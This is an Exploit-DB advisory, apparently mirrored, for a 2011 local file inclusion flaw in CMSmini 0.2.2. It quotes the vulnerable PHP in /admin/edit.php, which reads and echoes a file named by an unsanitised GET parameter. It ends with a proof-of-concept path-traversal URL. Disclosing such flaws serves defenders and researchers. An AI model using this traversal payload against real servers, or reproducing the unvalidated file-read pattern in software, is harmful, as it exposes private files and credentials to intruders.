CMS mini 0.2.2 – Local File Inclusion - 体验盒子

作者： BeopSeong/I2Sec

日期： 2011-10-20

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/18001/

# Exploit Title: [CMSmini 0.2.2 Local File Inclusion]
# Date: [2011.10.20]
# Author: [I2Sec5-BSK]
# Software Link: [http://sourceforge.net/projects/cmsmini/]
# Version: [CMSmini 0.2.2]
# Tested on: [Windows XP]

--------------------------------------------------

/admin/edit.php

30 $name = $_GET['name'];
73 $filename = $dirpath.'/'.$name;
74 $fh = fopen($filename, 'r');
75 $data = fread($fh, filesize($filename));
76 fclose($fh);
77 echo $data;

---------------------------------------------------

POC : http://[ Address ]/admin/edit.php?name=../../../../../../../../../../../../[ Local File ]